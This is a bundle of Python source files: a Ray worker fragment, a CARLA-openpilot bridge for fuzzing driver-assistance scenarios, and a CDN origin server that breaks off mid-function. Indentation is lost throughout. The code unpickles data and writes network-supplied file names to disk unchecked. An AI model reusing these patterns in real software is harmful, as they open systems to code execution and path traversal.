# Deserialize the function.
function = pickle.loads(serialized_function)
# Run the function.
function({"worker": self.worker})
except Exception:
# If an exception was thrown when the function was run, we record
# the traceback and notify the scheduler of the failure.
traceback_str = traceback.format_exc()
# Log the error message.
utils.push_error_to_driver(
self.worker,
ray_constants.FUNCTION_TO_RUN_PUSH_ERROR,
traceback_str,
job_id=ray.JobID(job_id))
|
bridge_customized.py
|
#!/usr/bin/env python3
# fuzzing parameter
# motorcycle leading
# not clear lane
# other vehicles block the views of the lanes
# other vehicle cut in lane
# start at high speed (npc at high speed)
# leading car stop/continue at traffic light (same lane and different lane)
# radar input? moving pedestrian
# ego car change lane?
# 155', 53
# 152', 53
# 148', 54
# 142', 56
# 134.9', 60,
# 120.6', 67,
# 106.2', 78,
# 90', 101
# 44;, 343
# 63', 178
# 90', 100
# 118', 68
# ground friction , weather , leading speed,
# ego car speed limit, angle limit
# connect svl simulator + apollo (json scenario for scenario interface? spawn point issue not moving issue? more compatible AutoFuzz interface)
# writing further improvement based on reviews
# 1.mechanism of longitudinal control (camera + lidar), mechanism of lateral control (camera)
# 2.think about coverage and output-based bug criteria
# print prediction of camera and radar separately
# no lanelines mode
# read code for longitudinal/lateral planning/control
# look into radar implementation for filtering out stationary objects
# check supercombo input output
# integrate matlab fusion
# -5.install cudnn in docker
# -4.radar output per frame, analyze mot case output
# -1.study failure cases and reason (crossing pedestrian, maybe the forward vehicle change lane, the forward vehicle turn case, and try on some other maps for going out of road) and explore the reasons
# 0.communication variable for control to start; separate actor initialization and behavior
# 1.study warnings and OP limitation list to build scenarios where warnings fail
# 2.fuzzing based on code logic + output feedback coverage VS baselines
# 3.look for other fusion algorithms and integrate them into OP
# 4.analysis of failure cases by fuzzing (clustering)
# ./CarlaUE4.sh -opengl -nosound -quality-level=Epic
# ./launch_openpilot.sh
# ./bridge_customized.py
# ./tmux_script.sh
import argparse
import atexit
import carla # pylint: disable=import-error
import math
import numpy as np
import time
import threading
from cereal import log
from typing import Any
import cereal.messaging as messaging
from common.params import Params
from common.realtime import Ratekeeper, DT_DMON
from lib.can import can_function
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
# addition:
from object_types import WEATHERS, car_types, large_car_types, motorcycle_types, cyclist_types, vehicle_colors
import shutil
from matplotlib import pyplot as plt
from utils import generate_actors, activate_actors, collect_carla_data, destroy, print_and_write, dist, change_lane, get_speed, radar_callback
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--low_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town06_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point',
type=int, default=16)
# addition
parser.add_argument('--data_folder', dest='data_folder',
type=str, default='data_folder')
args = parser.parse_args()
W, H = 1164, 874
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
# addition: from openpilot/selfdrive/config.py
RADAR_TO_CAMERA = 1.52 # RADAR is ~1.5 m ahead of the center of the mesh frame
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
# modification
# sm = messaging.SubMaster(['carControl','controlsState', 'modelV2'])
sm = messaging.SubMaster(['carControl','controlsState', 'modelV2', 'fcwData', 'radardData'])
# addition
import os
SAVE_DATA_PER_FRAMES = 1
save_folder = args.data_folder
if os.path.exists(save_folder):
shutil.rmtree(save_folder)
os.mkdir(save_folder)
if os.path.exists(save_folder+'/'+'model_output.txt'):
os.remove(save_folder+'/'+'model_output.txt')
for sub_name in ['front', 'top']:
sub_folder = os.path.join(save_folder, sub_name)
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button= 0
self.is_engaged=False
# addition:
self.radar_data = []
# responsibility & scenario design & fuzzing objective & Apollo version
# reference model? (how does reference model work?) (may drive along different routes?) state-machine is white-box based? example other than traffic light
# difference with apollo dreamland?
# apollo6.0?
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
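# Worked example: successive calls move toward the commanded angle by at most
# 0.5 degrees per step, e.g. steer_rate_limit(0.0, 2.0) -> 0.5,
# steer_rate_limit(0.5, 2.0) -> 1.0, and steer_rate_limit(1.9, 2.0) -> 2.0.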
frame_id = 0
def cam_callback(image, sub_folder='data_folder/front'):
global frame_id
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"image": img.tobytes(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
frame_id += 1
# addition
if frame_id % SAVE_DATA_PER_FRAMES == 0:
plt.imsave(os.path.join(sub_folder, str(frame_id)+'.jpg'), img[:, :, [2, 1, 0]])
# addition:
def other_cam_callback(image, sub_folder='data_folder/top'):
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
if frame_id % SAVE_DATA_PER_FRAMES == 0:
plt.imsave(os.path.join(sub_folder, str(frame_id)+'.jpg'), img[:, :, [2, 1, 0]])
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function():
pm = messaging.PubMaster(['pandaState'])
while 1:
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"flags": 1, # valid fix
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
def fake_driver_monitoring():
pm = messaging.PubMaster(['driverState','driverMonitoringState'])
while 1:
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs):
i = 0
while 1:
# modification:
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged, vs.radar_data)
time.sleep(0.01)
i+=1
def bridge(q):
automatic = False
visualize_radar = True
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
settings = world.get_settings()
settings.fixed_delta_seconds = 0.025
world.apply_settings(settings)
if args.low_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Particles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
# modification
if args.num_selected_spawn_point < 0:
# town03 circular
# spawn_point = carla.Transform(carla.Location(x=122, y=55.5, z=0.5), carla.Rotation(yaw=180))
# town06 left turn inner most
spawn_point = carla.Transform(carla.Location(x=315.5, y=252, z=0.3), carla.Rotation(yaw=360))
# town04 16 out-of-road
# spawn_point = carla.Transform(carla.Location(x=-154, y=-128, z=0.5), carla.Rotation(yaw=145))
# town04 01 out-of-road
# spawn_point = carla.Transform(carla.Location(x=384.6, y=-84.3, z=0.5), carla.Rotation(yaw=90))
# spawn_point = carla.Transform(carla.Location(x=385.6, y=-254.3, z=0.5), carla.Rotation(yaw=90))
else:
spawn_point = spawn_points[args.num_selected_spawn_point]
# right_turn
# spawn_point = carla.Transform(carla.Location(x=spawn_point.location.x, y=spawn_point.location.y, z=spawn_point.location.z+0.2), carla.Rotation(yaw=270))
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
# addition:
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '100')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=-7, z=4))
camera_top = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera_top.listen(other_cam_callback)
blueprint = blueprint_library.find('sensor.other.radar')
blueprint.set_attribute('horizontal_fov', '30') #30, 90
blueprint.set_attribute('vertical_fov', '1')
blueprint.set_attribute('range', '174') #174, 60
blueprint.set_attribute('sensor_tick', '0.05')
blueprint.set_attribute('points_per_second', '12000')#12000
transform = carla.Transform(carla.Location(x=2.32, z=1.13))
radar = world.spawn_actor(blueprint, transform, attach_to=vehicle)
radar.listen(lambda radar_data: radar_callback(radar_data, world, vehicle, vehicle_state, visualize_radar=visualize_radar))
sensors = [camera, imu, gps, camera_top, radar]
weather = WEATHERS[-2]
world.set_weather(weather)
blueprint = 'vehicle.yamaha.yzf'
blueprint2 = 'vehicle.tesla.model3'
blueprint3 = 'vehicle.yamaha.yzf'
blueprint4 = 'vehicle.yamaha.yzf'
loc = vehicle.get_location()
rot = vehicle.get_transform().rotation
forward = rot.get_forward_vector()
right = rot.get_right_vector()
new_loc = loc + forward*6 + right*(-3.5)
new_loc2 = loc + forward*12 + right*(-3.5)
new_loc3 = loc + forward*18 + right*(3.5)
new_loc4 = loc + forward*24
new_loc5 = loc + forward*120 + right*(-3.5)
scene = 'leading vehicle'
if scene == 'multiple vehicle':
actors_info = [(blueprint, new_loc.x, new_loc.y, new_loc.z, rot.yaw, 10), (blueprint2, new_loc2.x, new_loc2.y, new_loc2.z, rot.yaw, 10), (blueprint3, new_loc3.x, new_loc3.y, new_loc3.z, rot.yaw, 10), (blueprint4, new_loc4.x, new_loc4.y, new_loc4.z, rot.yaw, 10)]
elif scene == 'leading vehicle':
actors_info = [(blueprint2, new_loc2.x, new_loc2.y, new_loc2.z, rot.yaw, 10)]
elif scene == 'vehicle change lane':
actors_info = [(blueprint2, new_loc5.x, new_loc5.y, new_loc5.z, rot.yaw, 10)]
elif scene == 'leading motorcycle':
actors_info = [(blueprint, new_loc2.x, new_loc2.y, new_loc2.z, rot.yaw, 3)]
elif scene == 'empty':
actors_info = []
actors_list = generate_actors(world, actors_info)
# modification
atexit.register(destroy, sensors, actors_list)
# launch fake car threads
threading.Thread(target=panda_state_function).start()
threading.Thread(target=fake_driver_monitoring).start()
threading.Thread(target=can_function_runner, args=(vehicle_state,)).start()
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 #keyboard signal is always 1
brake_manual_multiplier = 0.7 #keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO #keyboard signal is always 1
# addition:
saved_frame_id = -1
initial_speed = 0.01
vx = initial_speed * np.cos(np.deg2rad(rot.yaw))
vy = initial_speed * np.sin(np.deg2rad(rot.yaw))
initial_velocity = carla.Vector3D(x=vx, y=vy, z=0)
vehicle.set_target_velocity(initial_velocity)
initial = True
tm = client.get_trafficmanager(8006)
tm.set_random_device_seed(0)
activate_actors(actors_info, actors_list, tm)
_vehicle_lights = (
carla.VehicleLightState.Position | carla.VehicleLightState.LowBeam
)
if weather.sun_altitude_angle < 0.0:
vehicle.set_light_state(carla.VehicleLightState(_vehicle_lights))
vehicles_list = world.get_actors().filter("*vehicle*")
for v in vehicles_list:
v.set_light_state(carla.VehicleLightState(_vehicle_lights))
while 1:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
print('m:', m[0], m[1])
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
#in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
#steer_out = steer_out
# steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
# print('initial', initial, 'is_openpilot_engaged', is_openpilot_engaged, 'cruise_button', cruise_button, CruiseButtons.RES_ACCEL)
# addition
model_output = None
if is_openpilot_engaged:
sm.update(0)
throttle_op = sm['carControl'].actuators.gas #[0,1]
brake_op = sm['carControl'].actuators.brake #[0,1]
steer_op = sm['controlsState'].steeringAngleDesiredDeg # degrees [-180,180]
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
# addition:
model_output = sm['modelV2']
fcw_data = sm['fcwData']
radard_data = sm['radardData']
else:
if throttle_out==0 and old_throttle>0:
if throttle_ease_out_counter>0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out==0 and old_brake>0:
if brake_ease_out_counter>0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out==0 and old_steer!=0:
if steer_ease_out_counter>0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1,1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out/0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
# if rk.frame%PRINT_DECIMATION == 0:
# print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
# addition
if frame_id % SAVE_DATA_PER_FRAMES == 0 and saved_frame_id!=frame_id:
with open(save_folder+'/'+'model_output.txt', 'a') as f_out:
loc = vehicle.get_location()
print_and_write(f_out, '-'*20+str(rk.frame)+','+str(frame_id)+'-'*10+'\n')
ego_car_status = {
"engaged": is_openpilot_engaged,
"speed": speed,
"steer_out": steer_out,
"steer_op": steer_op,
"throttle": round(vc.throttle, 3),
"brake": round(vc.brake, 3),
"location": (round(loc.x, 3), round(loc.y, 3)),
"yaw": round(vehicle.get_transform().rotation.yaw, 3)
}
print_and_write(f_out, 'ego car status:'+str(ego_car_status)+'\n')
if model_output and model_output.leads:
if len(actors_list) > 0:
lead_d_carla = collect_carla_data(vehicle, actors_list[0])
else:
lead_d_carla = None
lead_msg = model_output.leads[0]
lead_d_camera = {
"dRel": float(lead_msg.xyva[0] - RADAR_TO_CAMERA),
"yRel": float(-lead_msg.xyva[1]),
"vRel": float(lead_msg.xyva[2]),
"a": float(lead_msg.xyva[3]),
"dRelStd": float(lead_msg.xyvaStd[0]),
"yRelStd": float(lead_msg.xyvaStd[1]),
"vRelStd": float(lead_msg.xyvaStd[2]),
"aStd": float(lead_msg.xyvaStd[3]),
"prob": float(lead_msg.prob),
"t": float(lead_msg.t),
}
additional_info = {
"hardBrakePredicted": model_output.meta.hardBrakePredicted,
# "disengagePredictions": model_output.meta.disengagePredictions,
}
print_and_write(f_out, 'lead ground-truth: '+str(lead_d_carla)+'\n')
print_and_write(f_out, 'lead predicted camera'+str(lead_d_camera)+'\n')
# print_and_write(f_out, 'fcw_data:'+str(fcw_data)+'\n')
print_and_write(f_out, 'radard_data'+str(radard_data)+'\n')
print_and_write(f_out, 'additional_info:'+str(additional_info)+'\n')
# print_and_write(f_out, 'model_output_meta:'+str(model_output.meta)+'\n')
saved_frame_id = frame_id
# print('actor speed:', get_speed(actors_list[0]))
# addition:
if scene == 'vehicle change lane':
d = dist(vehicle, actors_list[0])
if d < 40:
# print('dist', d)
other_v = actors_list[0].get_velocity()
change_lane(actors_list[0], True, tm)
rk.keep_time()
def go(q: Any):
while 1:
try:
bridge(q)
except RuntimeError as e:
print(repr(e))
print("Restarting bridge...")
# addition
def getch():
import sys
import termios
from termios import (BRKINT, CS8, CSIZE, ECHO, ICANON, ICRNL, IEXTEN, INPCK,
ISTRIP, IXON, PARENB, VMIN, VTIME)
from typing import Any
# Indexes for termios list.
IFLAG = 0
OFLAG = 1
CFLAG = 2
LFLAG = 3
ISPEED = 4
OSPEED = 5
CC = 6
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
# set
mode = termios.tcgetattr(fd)
mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON)
#mode[OFLAG] = mode[OFLAG] & ~(OPOST)
mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB)
mode[CFLAG] = mode[CFLAG] | CS8
mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN)
mode[CC][VMIN] = 1
mode[CC][VTIME] = 0
termios.tcsetattr(fd, termios.TCSAFLUSH, mode)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def keyboard_poll_thread_customized(q, start_time):
time.sleep(start_time)
count = 0
commands_list = [1, 1, 1, 1, 1, 1, 1, 1]
for command in commands_list:
time.sleep(1)
if command == 1:
print('put cruise up')
q.put("cruise_up")
elif command == 0:
print('put cruise down')
q.put("cruise_down")
else:
raise ValueError('unknown command: %s' % command)
while True:
c = getch()
# print("got %s" % c)
if c == '1':
q.put("cruise_up")
elif c == '2':
q.put("cruise_down")
elif c == '3':
q.put("cruise_cancel")
elif c == 'w':
q.put("throttle_%f" % 1.0)
elif c == 'a':
q.put("steer_%f" % 0.15)
elif c == 's':
q.put("brake_%f" % 1.0)
elif c == 'd':
q.put("steer_%f" % -0.15)
elif c == 'q':
exit(0)
if __name__ == "__main__":
# make sure params are in a good state
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
from multiprocessing import Process, Queue
q: Any = Queue()
p = Process(target=go, args=(q,))
p.daemon = True
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
# keyboard_poll_thread(q)
keyboard_poll_thread_customized(q, start_time=15)
|
originServer2.py
|
# 4 main components
# Serve edge servers
# Send heartbeat to backup
# Receive data from Content providers
# Replicate data to backup
from _thread import *
import socket
import sys
import time
import sched
from threading import Timer, Thread
import selectors
import os
from enum import Enum
import pickle
from threading import Timer, Thread, Lock
sys.path.insert(0, "../../")
from messages.content_related_messages import *
from messages.origin_heartbeat_message import *
from config import *
from edgeServer.edgeServer import md5
class ContentStatus:
INCOMPLETE = 0
UNSYNCED = 1
STORED = 2
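# Inferred from usage below: INCOMPLETE marks a transfer still in progress,
# UNSYNCED marks content stored locally but not yet replicated to the peer
# origin server, and STORED marks content that is fully replicated.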
class Content:
def __init__(self, content_id, filename, status):
self.content_id = content_id
self.filename = filename
self.status = status
####################################
# Global tables and lock variables #
####################################
content_dict = {}
content_dictL = Lock()
def dump():
global content_dict
f = open(ORIGIN_METADATA_FILENAME, 'wb')
pickle.dump(content_dict, f)
f.close()
def load():
global content_dict
f = open(ORIGIN_METADATA_FILENAME, 'rb')
content_dict = pickle.load(f)
f.close()
def print_dict():
global content_dict
for content in content_dict.values():
print(content.content_id, content.filename, content.status)
####################################
def synchronizer():
global content_dict, content_dictL
while(True):
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = ORIGIN_SERVER_IP_2
port = ORIGIN_SYNCHRONIZER_PORT_2
sock.bind((host, port))
sock.listen(1)
conn, addr = sock.accept()
print('Accepted', conn, 'from', addr)
print('Connected to other Origin Server')
while(True):
print("Looking for UNSYNCED files")
try:
for file in content_dict.values():
if file.status == ContentStatus.UNSYNCED:
# Sync this file
print("Syncing file", file.filename, "with content id", file.content_id)
file_size = int(os.stat('../data/'+file.filename).st_size)
file_des = FileDescriptionMessage(file.content_id,file_size,file.filename,md5('../data/'+file.filename))
print(file.content_id,file_size,file.filename,md5('../data/'+file.filename))
file_des.send(conn)
# receive response from other server
msg = OriginHeartbeatMessage(0)
msg.receive(conn)
if msg.file_exists:
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.STORED
dump()
content_dictL.release()
continue
f = open('../data/'+file.filename, 'rb')
l = f.read(1018)
i = 0
while (l):
# if message.seq_no <= i:
msg = ContentMessage(file.content_id, i)
msg.data = l
msg.packet_size = len(l)
msg.send(conn)
i += 1
l = f.read(1018)
f.close()
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.STORED
dump()
content_dictL.release()
time.sleep(ORIGIN_HEARTBEAT_TIME)
except Exception as e:
print(e)
break
def synchronize_receive():
global content_dict, content_dictL
host = ORIGIN_SERVER_IP_1
port = ORIGIN_SYNCHRONIZER_PORT_1
while(True):
while(True):
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket successfully created')
sock.connect((host, port))
print("Connected to other server")
break
except:
print("Cannot connect to other server")
time.sleep(1)
continue
flag = 1
while(True):
try:
file_des = FileDescriptionMessage(0, 0, '', '')
file_des.receive(sock)
if file_des.received:
print("Receiving sync file details:")
print(file_des.file_name)
print(file_des.content_id)
print(file_des.file_size)
# check if file already exists and respond to the other server
if file_des.content_id in content_dict:
content = content_dict[file_des.content_id]
if content.status == ContentStatus.STORED:
file_exists = True
elif content.status == ContentStatus.UNSYNCED:
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.STORED
dump()
content_dictL.release()
file_exists = True
else: # can check MD5 for incomplete files but unnecessary hassle :/
file_exists = False
else:
file_exists = False
msg = OriginHeartbeatMessage(file_exists)
msg.send(sock)
if file_exists:
continue
content_dictL.acquire()
content_dict[file_des.content_id] = Content(file_des.content_id, file_des.file_name, ContentStatus.INCOMPLETE)
dump()
content_dictL.release()
with open('../data/' + file_des.file_name, 'wb') as f:
print('file opened')
print("Content ID: ",file_des.content_id)
content_id = file_des.content_id
file_size = file_des.file_size
total_received=0
seq_no=0
last_seq_number_recv = -1
while True:
msg = ContentMessage(content_id, seq_no)
try:
msg.receive(sock,file_size,total_received)
except Exception as e:
print("Last Sequence Number received: ",last_seq_number_recv)
print(e)
flag = 0
break
# return last_seq_number_recv
print("Sequence no: ",msg.seq_no)
last_seq_number_recv = msg.seq_no
data = msg.data
total_received+=len(data)
# print(len(data))
if not data:
break
f.write(data)
if flag == 0:
break
f.close()
content_dictL.acquire()
content_dict[file_des.content_id] = Content(file_des.content_id, file_des.file_name, ContentStatus.STORED)
dump()
content_dictL.release()
else:
print("Error receiving")
break
except Exception as e:
print(e)
def serve_edge_server_helper(conn, addr):
global content_dict
message = ContentRequestMessage(0, 0)
try:
message.receive(conn)
# Get filename from file
        if not message.received:
return
        # Check if the requested file is present on this origin server
if message.content_id in content_dict:
filename = content_dict[message.content_id].filename
# before sending the file, send its details plus a checksum
file_size = int(os.stat('../data/'+filename).st_size)
print("filename: ",filename)
file_des = FileDescriptionMessage(message.content_id, file_size, filename, md5('../data/'+filename))
file_des.send(conn)
f = open('../data/'+filename, 'rb')
l = f.read(1018)
i = 0
while (l):
if message.seq_no <= i:
msg = ContentMessage(message.content_id, i)
msg.data = l
msg.packet_size = len(l)
msg.send(conn)
i += 1
l = f.read(1018)
f.close()
else:
# Get chunks of data from origin and send to client
pass
conn.close()
except Exception as e:
print(e)
def serve_edge_server():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket successfully created")
except socket.error as err:
print ("socket creation failed with error %s" %(err))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = ORIGIN_SERVER_PORT_2
s.bind(('', port))
print ("socket binded to %s" %(port))
s.listen(5)
threads = []
while True:
c, addr = s.accept()
print("Accepted connection from", addr)
t = Thread(target = serve_edge_server_helper, args = (c,addr))
threads.append(t)
t.start()
for t in threads:
t.join()
s.close()
def serve_content_provider_helper(c,addr):
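    # Ingest a file pushed by the content provider: record it as INCOMPLETE,
    # write the streamed chunks to ../data/, verify the MD5 from the file
    # description, then mark it UNSYNCED so the synchronizer thread forwards
    # it to the other origin server.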
global content_dict, content_dictL
file_des = FileDescriptionMessage(0, 0, '', '')
file_des.receive(c)
print(file_des.file_name)
print(file_des.content_id)
print(file_des.file_size)
content_dictL.acquire()
content_dict[file_des.content_id] = Content(file_des.content_id, file_des.file_name, ContentStatus.INCOMPLETE)
dump()
content_dictL.release()
with open('../data/'+file_des.file_name,'wb') as f:
recv_size = 0
file_size = file_des.file_size
while True:
mes = ContentMessage(0,0)
print('receiving data...')
mes.receive(c,file_size,recv_size)
print(mes.content_id)
print(mes.seq_no)
data = mes.data
if not data:
break
f.write(data)
recv_size+=len(data)
print("successfully received the file")
if md5('../data/'+file_des.file_name) == file_des.md5_val:
print("MD5 Matched!")
else:
print("MD5 didn't match")
content_dictL.acquire()
content_dict[file_des.content_id].status = ContentStatus.UNSYNCED
dump()
content_dictL.release()
print_dict()
c.close()
def serve_content_provider():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket successfully created")
except socket.error as err:
print ("socket creation failed with error %s" %(err))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = ORIGIN_CONTENT_PROVIDER_PORT_2
s.bind(('', port))
print ("socket binded to %s" %(port))
s.listen(5)
threads = []
while True:
c, addr = s.accept()
print("Accepted connection from", addr)
